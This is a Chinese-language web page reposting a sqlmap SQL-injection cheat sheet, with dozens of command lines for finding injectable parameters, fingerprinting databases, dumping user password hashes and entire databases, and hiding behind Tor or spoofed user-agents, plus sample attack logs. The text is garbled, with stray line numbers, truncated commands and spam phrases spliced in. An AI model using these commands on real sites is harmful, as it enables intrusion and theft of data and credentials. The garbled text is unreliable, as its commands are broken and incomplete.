注入常用語(yǔ)句 T users sinp 4 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) DBMS: PostgreSQL : users id blissettnameisnull bunnyming 這個(gè)東西，是mickey整理的，不多說(shuō)了，尊重一下原作者，轉(zhuǎn)載注明mickey整理就好了 21 22 更新 23

注入常用語(yǔ)句

T users sinp> 4 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) DBMS: PostgreSQL : users id blissett nameisnull bunny ming 這個(gè)東西，是mickey整理的，不多說(shuō)了，香港服務(wù)器，尊重一下原作者，轉(zhuǎn)載注明mickey整理就好了 21 22 更新 23 svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev m=1″ -v 1 –sql-shell //執(zhí)行SQL語(yǔ)句 m更詳細(xì)的信息 options from a configuration INI file 30 sqlmap -c sqlmap.conf 31 32 使用POST方法提交 sqlmap/oracle/post_int.php” –method POST –data “id=1″ 使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData來(lái)抓cookies sqlmap使用referer欺騙 sqlmap使用自定義user-agent,或者使用隨機(jī)使用自帶的user-agents.txt sqlmapagent “Mozillapython sqlmap.py sqlmapa “.agents.txt” 46 47 使用基本認(rèn)證 sqlmap使用Digest認(rèn)證 sqlmap使用代理,配合TOR sqlmap.1.47:3128″ sqlmap.1.47:8118″ 56 57 使用多線程猜解 sqlmap–threads 繞過(guò)動(dòng)態(tài)檢測(cè),直接指定有注入點(diǎn)的參數(shù),可以使用,分割多個(gè)參數(shù),指定user-agent注入 sqlmapp “id sqlmapcatp “cat,id” sqlmapagent” –.7rc1 (http://sqlmap.sourceforge.net)” 64 65 指定數(shù)據(jù)庫(kù),繞過(guò)SQLMAP的自動(dòng)檢測(cè) sqlmap/pgsql/get_int.php?id=1″ -v 2 –dbms “PostgreSQL” MySQL 69 * Oracle 70 * PostgreSQL 71 * Microsoft SQL Server 72 73 指定操作系統(tǒng),繞過(guò)SQLMAP自動(dòng)檢測(cè) sqlmap/pgsql/get_int.php?id=1″ -v 2 –os “Windows” Linux 77 * Windows 78 79 自定義payload 80 Options: –prefix and –postfix circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix. users . “‘) LIMIT 0, 1″;: .″ test” 87 88 [...] 89 [hh:mm:16] [INFO] testing sql injection on GET parameter ‘id’ with 0 parenthesis 90 [hh:mm:16] [INFO] testing custom injection on GET parameter ‘id’ 91 [hh:mm:16] [TRAFFIC OUT] HTTP request: 92 GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20 93 %28%27test%27=%27test HTTP/1.1 94 Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 95 Host: 192.168.1.121:80 96 Accept-language: en-us,en;q=0.5 97 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, 98 image/png,*/*;q=0.5 99 User-agent: sqlmap/0.7rc1 () 100 Connection: close 101 [...] 102 [hh:mm:17] [INFO] GET parameter ‘id’ is custom injectable 103 [...] 104 105 As you can see, the injection payload for testing for custom injection is: 106 107 id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test 108 109 which URL decoded is: test makes the query syntatically correct to the page query: users (‘test’='test’) LIMIT 0, 1 116 117 In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it. 118 119 頁(yè)面比較 120 python sqlmap.py -u “?id=1″ –string “luther” -v 1 121 python sqlmap.py -u “?id=1″ –regexp “lu[\w][\w]er” -v 122 123 排除網(wǎng)站的內(nèi)容 124 python sqlmap.py -u “?id=1″ –excl-reg “Dynamic content: ([\d]+)” 125 126 多語(yǔ)句測(cè)試，php內(nèi)嵌函數(shù)mysql_query(),不支持多語(yǔ)句 127 python sqlmap.py -u “?id=1″ –stacked-test -v 1 128 129 union注入測(cè)試 130 python sqlmap.py -u “?id=1″ –union-test -v 1 131 132 unionz注入配合orderby 133 python sqlmap.py -u “?id=1″ –union-test –union-tech orderby -v 1 134 135 python sqlmap.py -u “?id=1″ -v 1 –union-use –banner 136 python sqlmap.py -u “?id=1″ -v 5 –union-use –current-user 137 python sqlmap.py -u “?id=1″ -v 1 –union-use –dbs 138 139 fingerprint 140 python sqlmap.py -u “?id=1″ -v 1 -f 141 python sqlmap.py -u “?name=luther” -v 1 -f -b 142 143 判斷當(dāng)前用戶是否是dba 144 python sqlmap.py -u “?id=1″ –is-dba -v 1 145 146 列舉數(shù)據(jù)庫(kù)用戶 147 python sqlmap.py -u “?id=1″ –users -v 0 148 149 列舉數(shù)據(jù)庫(kù)用戶密碼 150 python sqlmap.py -u “?id=1″ –passwords -v 0 151 python sqlmap.py -u “?id=1″ –passwords -U sa -v 0 152 153 查看用戶權(quán)限 154 python sqlmap.py -u “?id=1″ –privileges -v 0 155 python sqlmap.py -u “?id=1″ –privileges -U postgres -v 0 156 157 列數(shù)據(jù)庫(kù) 158 python sqlmap.py -u “?id=1″ –dbs -v 0 159 160 列出指定數(shù)據(jù)庫(kù)指定表的列名 161 python sqlmap.py -u “?id=1″ –columns -T users -D test -v 1 162 163 列出指定數(shù)據(jù)庫(kù)的指定表的指定列的內(nèi)容 164 python sqlmap.py -u “?id=1″ –dump -T users -D master -C surname -v 0 165 166 指定列的范圍從2－4 167 python sqlmap.py -u “?id=1″ –dump -T users -D test –start 2 –stop 4 -v 0 168 169 導(dǎo)出所有數(shù)據(jù)庫(kù)，所有表的內(nèi)容 170 python sqlmap.py -u “?id=1″ –dump-all -v 0 171 172 只列出用戶自己新建的數(shù)據(jù)庫(kù)和表的內(nèi)容 173 python sqlmap.py -u “?id=1″ –dump-all –exclude-sysdbs -v 0 174 175 sql query 176 python sqlmap.py -u “?id=1″ –sql-query “SELECT usename FROM pg_user” -v 0 177 python sqlmap.py -u “?id=1″ –sql-query “SELECT host, password FROM mysql.user LIMIT 1, 3″ -v 1 178 179 SELECT usename, passwd FROM pg_shadow ORDER BY usename 180 181 保存和恢復(fù)會(huì)話 182 python sqlmap.py -u “?id=1″ -b -v 1 -s “sqlmap.log” 183 184 保存選項(xiàng)到INC配置文件 185 python sqlmap.py -u “?id=1″ -b -v 1 –save ===================================================== 2、sqlmap -g "關(guān)鍵詞“ //這是通過(guò)google搜索注入，現(xiàn)在還不可以，不知道是什么原因，網(wǎng)站空間，可以直接修改為百度 194 3、 195 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 [hh:mm:25] [INFO] testing if the url is stable, wait a few seconds 199 [hh:mm:26] [INFO] url is stable id' is dynamic id' is dynamic id' is dynamic id' 204 [hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter [hh:mm:26] [INFO] confirming numeric/unescaped injection on GET idid' is numeric/unescaped injectable 209 [hh:mm:26] [INFO] testing MySQL ) 211 [hh:mm:26] [INFO] retrieved: 55 212 [hh:mm:26] [INFO] performed 20 queries in 0 seconds 213 [hh:mm:26] [INFO] confirming MySQL ) 215 [hh:mm:26] [INFO] retrieved: 1 216 [hh:mm:26] [INFO] performed 13 queries in 0 seconds 217 [hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 218 0, 1 219 [hh:mm:26] [INFO] retrieved: 5 220 [hh:mm:26] [INFO] performed 13 queries in 0 seconds 221 remote DBMS: MySQL >= 5.0.0 4、指定參數(shù)注入 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 228 -p "id" [hh:mm:17] [INFO] testing if the url is stable, wait a few seconds 232 [hh:mm:18] [INFO] url is stable id' 234 [hh:mm:18] [INFO] testing numeric/unescaped injection on parameter [hh:mm:18] [INFO] confirming numeric/unescaped injection on idid' is numeric/unescaped injectable 239 [...] Or if you want to provide more than one parameter, for instance: $ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 246 1 -p "cat,id" 5、指定方法和post的數(shù)據(jù) 250 python sqlmap.py -u "http://192.168.1.47/page.php" --method "POST" -- 251 data "id=1&cat=2" 6、指定cookie,可以注入一些需要登錄的地址 255 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --cookie 256 "COOKIE_VALUE" 7、通過(guò)代理注入 260 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --proxy 261 "http://127.0.0.1:8118" 262 8、指定關(guān)鍵詞，香港服務(wù)器，也可以不指定。程序會(huì)根據(jù)返回結(jié)果的hash自動(dòng)判斷 263 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --string 264 "STRING_ON_TRUE_PAGE" 265 9、指定數(shù)據(jù)，這樣就不用猜測(cè)其他的數(shù)據(jù)庫(kù)里。可以提高效率。 266 --remote-dbms 267 10、指紋判別數(shù)據(jù)庫(kù)類型 268 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f 269 11、獲取banner信息 270 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -b .

posted on

聲明：本網(wǎng)頁(yè)內(nèi)容旨在傳播知識(shí)，若有侵權(quán)等問(wèn)題請(qǐng)及時(shí)與本網(wǎng)聯(lián)系，我們將在第一時(shí)間刪除處理。TEL:177 7030 7066 E-MAIL:11247931@qq.com